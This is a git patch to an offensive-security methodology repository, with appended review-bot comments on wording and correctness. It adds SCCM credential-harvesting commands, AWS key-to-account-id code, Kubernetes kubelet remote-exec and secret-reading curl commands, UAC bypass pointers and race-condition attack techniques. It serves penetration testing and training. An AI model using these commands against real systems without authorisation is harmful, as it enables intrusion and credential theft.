From 07cf2831cac782cc0c7361e5811f448c815265f7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 28 Oct 2023 17:31:59 +0200 Subject: [PATCH] AWS Key ID + UAC + Race Condition --- .../Active Directory Attack.md | 7 ++ .../Cloud - AWS Pentest.md | 25 +++++- .../Container - Docker Pentest.md | 2 +- .../Container - Kubernetes Pentest.md | 39 +++++++--- .../Windows - Defenses.md | 28 +++++++ Race Condition/README.md | 78 +++++++++++++++---- 6 files changed, 153 insertions(+), 26 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3807101..a9b5d5b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -4048,6 +4048,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th > If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. +On the machine. * Find SCCM blob ```ps1 Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" @@ -4065,6 +4066,12 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th ConvertFrom-SddlString "" ``` +From a remote machine. +* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter) + ```ps1 + python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto + ``` + ## SCCM Shares diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 6129a3f..53a9499 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md 
@@ -247,7 +247,7 @@ ### Access Key ID & Secret -> IAM uses the following prefixes to indicate what type of resource each unique ID applies to. +IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. | Prefix | Resource type | |--------------|-------------------------| @@ -264,6 +264,28 @@ | ASCA | Certificate | | ASIA | Temporary (AWS STS) access key | +The rest of the string is Base32 encoded and can be used to recover the account id. + +```py +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + + +print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + ## AWS - Metadata SSRF @@ -2385,3 +2407,4 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" * [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) * [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) * [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) +* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) \ No newline at end of file diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md index b836acd..eff3dc6 100644 
--- a/Methodology and Resources/Container - Docker Pentest.md +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -1,4 +1,4 @@ -# Container - Docker Pentest +# Container - Docker > Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. diff --git a/Methodology and Resources/Container - Kubernetes Pentest.md b/Methodology and Resources/Container - Kubernetes Pentest.md index c59775f..5d39b0f 100644 --- a/Methodology and Resources/Container - Kubernetes Pentest.md +++ b/Methodology and Resources/Container - Kubernetes Pentest.md @@ -1,12 +1,13 @@ -# Container - Kubernetes Pentest +# Container - Kubernetes -> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management. +> Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications ## Summary - [Tools](#tools) -- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) -- [Obtaining Service Account Token](#obtaining-service-account-token) +- [Exploits](#exploits) + - [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) + - [Obtaining Service Account Token](#obtaining-service-account-token) - [References](#references) ## Tools 
@@ -22,9 +23,26 @@ kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml ``` -* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) +* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) - Executes commands in a container on a kubelet endpoint that allows anonymous authentication +* [DataDog/KubeHound](https://github.com/DataDog/KubeHound) - Kubernetes Attack Graph + ```ps1 + # Critical paths enumeration + kh.containers().criticalPaths().count() + kh.containers().dedup().by("name").criticalPaths().count() + kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count() + kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count() + kh.endpoints(EndpointExposure.External).criticalPaths().count() + kh.services().criticalPaths().count() -## Accessible kubelet on 10250/TCP + # DNS services and port + kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1) + .dedup().valueMap("serviceDns","port") + .group().by("serviceDns").by("port") + ``` + +## Exploits + +### Accessible kubelet on 10250/TCP Requirements: * `--anonymous-auth`: Enables anonymous requests to the Kubelet server 
@@ -32,15 +50,18 @@ Requirements: * Getting pods: `curl -ks https://worker:10250/pods` * Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'` -## Obtaining Service Account Token + +### Obtaining Service Account Token Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token` Use the service account token: -* on kube-apiserver API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` +* on `kube-apiserver` API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` * with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="" get secrets --all-namespaces -o json` ## References -* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) \ No newline at end of file +* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) +* [kubehound - Attack Reference](https://kubehound.io/reference/attacks/) +* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Defenses.md b/Methodology and Resources/Windows - Defenses.md index 50d0298..d346323 100644 --- a/Methodology and Resources/Windows - Defenses.md +++ b/Methodology and Resources/Windows - Defenses.md @@ -3,6 +3,7 @@ ## Summary * [AppLocker](#applocker) +* [User Account Control](#user-account-control) * [DPAPI](#dpapi) * [Powershell](#powershell) * [Anti Malware Scan Interface](#anti-malware-scan-interface) 
@@ -36,6 +37,33 @@ * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) +## User Account Control + +UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer. + +* Check if UAC is enabled + ```ps1 + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA + ``` +* Check UAC level + ``` + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken + ``` + +| EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description | +|---|---|---|---| +| 0 | / | / | No UAC | +| 1 | 1 | / | No UAC | +| 1 | 0 | 0 | No UAC for RID 500 | +| 1 | 0 | 1 | UAC for Everyone | + + +* UAC Bypass + * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc + * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control + + ## DPAPI Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) diff --git a/Race Condition/README.md b/Race Condition/README.md index 60d18fe..afcfdbc 100644 --- a/Race Condition/README.md +++ b/Race Condition/README.md 
@@ -4,31 +4,42 @@ ## Summary -- [Race Condition](#race-condition) - - [Summary](#summary) - - [Tools](#tools) - - [Labs](#labs) - - [Limit-overrun](#limit-overrun) - - [Rate-limit bypass](#rate-limit-bypass) - - [Turbo Intruder](#turbo-intruder) +- [Tools](#tools) +- [Labs](#labs) +- [Exploit](#exploit) + - [Limit-overrun](#limit-overrun) + - [Rate-limit bypass](#rate-limit-bypass) +- [Techniques](#techniques) + - [HTTP/1.1 last-byte synchronization](#http11-last-byte-synchronization) + - [HTTP/2 Single-packet attack](#http2-single-packet-attack) +- [Turbo Intruder](#turbo-intruder) - [Example 1](#example-1) - [Example 2](#example-2) - - [References](#references) +- [References](#references) ## Tools -* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder) +* [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. +* [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use. 
## Labs * [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun) +* [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint) +* [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits) +* [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint) +* [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) +* [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) +* [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) -## Limit-overrun +## Exploit -TODO +### Limit-overrun + +Overdrawing limit, multiple voting, multiple spending of a gifcard. **Examples**: 
@@ -37,13 +48,48 @@ TODO * [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609) -## Rate-limit bypass +### Rate-limit bypass -TODO +Bypassing anti-bruteforce mechanism and 2FA. **Examples**: -* []() +* [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM) + + +## Techniques + +### HTTP/1.1 last-byte synchronization + +Send every requests execpt the last byte, then "release" each request by sending the last byte. + +Execute a last-byte synchronization using Turbo Intruder + +```py +engine.queue(request, gate='race1') +engine.queue(request, gate='race1') +engine.openGate('race1') +``` + +**Examples**: + +* [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style) + + +### HTTP/2 Single-packet attack + +In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter. + +* [turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py) +* Burp Suite + * Send a request to Repeater + * Duplicate the request 20 times (CTRL+R) + * Create a new group and add all the requests + * Send group in parallel (single-packet attack) + +**Examples**: + +* [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE) ## Turbo Intruder 
@@ -115,7 +161,9 @@ def handleResponse(req, interesting): ## References * [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle](https://youtu.be/tKJzsaB1ZvI) +* [Smashing the state machine: the true potential of web race conditions - James Kettle / @albinowax - 09 August 2023](https://portswigger.net/research/smashing-the-state-machine) * [Turbo Intruder: Embracing the billion-request attack - James Kettle - 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) * [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - Apr 24, 2018](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) * [Race conditions on the web - Josip Franjkovic - July 12th, 2016](https://www.josipfranjkovic.com/blog/race-conditions-on-web) -* [New techniques and tools for web race conditions - Emma Stocks - 10 August 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions) \ No newline at end of file +* [New techniques and tools for web race conditions - Emma Stocks - 10 August 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions) +* [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat](https://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf) \ No newline at end of file
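Review bot: In the first Active Directory hunk, the new line "On the machine." is a sentence fragment that does not say which machine; since the bullets that follow run WMI queries against the local CCM policy namespace, suggest "Locally, on the SCCM client:" so it reads as the counterpart of the "From a remote machine." line added in the next hunk.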
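Review bot: The sccmhunter command in the second Active Directory hunk has a trailing dot in the DC address, `-dc-ip 10.10.10.10.`, which is not a valid IP and will make the example fail when pasted; drop the final dot. The fence is also tagged `ps1` although the line is a `python3 ./sccmhunter.py ...` invocation, so `bash` (or `powershell` only if that is really the intended shell) would be the accurate tag.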
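Review bot: In the first AWS hunk, removing the `>` from "IAM uses the following prefixes to indicate what type of resource each unique ID applies to." turns a quotation from the AWS IAM documentation into unattributed prose; either keep the blockquote or add the IAM "unique identifiers" documentation to the References list so the source of the prefix table stays traceable.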
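Review bot: The Python snippet in the second AWS hunk works as written (the 16 characters after the prefix decode to 10 bytes, and the mask `7fffffffff80` keeps 40 bits of the first 6 bytes, enough for a 12-digit account id), but the reader has no way to see that from the code; suggest a comment such as `# keep bits 7..46 of the first 6 bytes: the 40-bit account id` next to the mask, and mention in the prose that the technique comes from the Tal Be'ery note added to References. Minor style: `print (` and `return (e)` should be `print(` and `return e`.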
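Review bot: The AWS References hunk and the Race Condition References hunk both leave the file without a trailing newline ("\ No newline at end of file" on the `+` side); add a final newline so the next reference appended does not produce a spurious one-line diff.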
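Review bot: Renaming the Docker heading from "Container - Docker Pentest" to "Container - Docker" changes the rendered anchor from `#container---docker-pentest` to `#container---docker`; the same applies to the Kubernetes heading in the next file. Please check the top-level README and any cross-links in the other Methodology pages for links to the old anchors before merging.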
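Review bot: In the first Kubernetes hunk the new description "Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications" is missing its final period. The Summary now nests the two sections under "Exploits", which matches the `## Exploits` / `### ...` headings introduced later in the file, so the anchors stay valid.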
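Review bot: The KubeHound block in the second Kubernetes hunk is fenced as `ps1`, but `kh.containers().criticalPaths().count()` and the `.group().by("serviceDns").by("port")` traversal are Gremlin/Groovy DSL queries typed into the KubeHound console, not PowerShell; tag the fence `groovy` (or leave it untagged) so readers do not try to run it in a PowerShell session, and say in the bullet that these are console queries run after ingesting a cluster.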
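Review bot: The UAC table in the Windows Defenses hunk has a column for `LocalAccountTokenFilterPolicy`, yet the "Check UAC level" commands above it query `ConsentPromptBehaviorAdmin` and `FilterAdministratorToken` only, so a reader cannot fill in the table from the checks shown. Add `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy` (the value lives under the same key) and either add `ConsentPromptBehaviorAdmin` to the table or drop that query. The "Description" column also describes remote token filtering for network logons by local administrator accounts rather than interactive prompting, so "No UAC" for `EnableLUA=1, LocalAccountTokenFilterPolicy=1` is misleading; label the column as remote UAC filtering. Minor: the second fence has no language tag while the first is `ps1`, and "etc" needs a period.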
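Review bot: In the first Race Condition hunk, the Raceocat bullet "highly efficient and ease-of-use" mixes an adjective with a noun phrase; suggest "highly efficient and easy to use". Removing the self-referencing "Race Condition" and "Summary" entries from the Summary is a good cleanup.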
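Review bot: The Labs list in the second Race Condition hunk adds "PortSwigger - Multi-endpoint race conditions" twice with the same URL; remove one copy. In the Limit-overrun text, "gifcard" should be "gift card", and "Overdrawing limit, multiple voting, multiple spending of a gifcard." is a fragment; suggest "Overdrawing a limit, voting multiple times, or spending a gift card more than once."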
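Review bot: In the Techniques hunk, "Using a single request remove the network jitter" is wrong on the substance: the single-packet attack removes jitter by putting the ~20-30 requests into one TCP packet, not by sending a single request, so it should read "Sending them in a single packet removes the network jitter"; "around ~20/30" doubles the approximation marker. Also "Send every requests execpt the last byte" should be "Send every request except its last byte". The last-byte snippet uses a bare `request` that is undefined in a Turbo Intruder script; the working form, as in the upstream examples, is `engine.queue(target.req, gate='race1')` inside `queueRequests(target, wordlists)`, followed by `engine.openGate('race1')`, so quoting it that way avoids a copy-paste failure.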
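Review bot: In the References hunk, the new HITB entry "Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat" is the only one without a date while every neighbouring entry carries one; add the conference date for consistency with the list style.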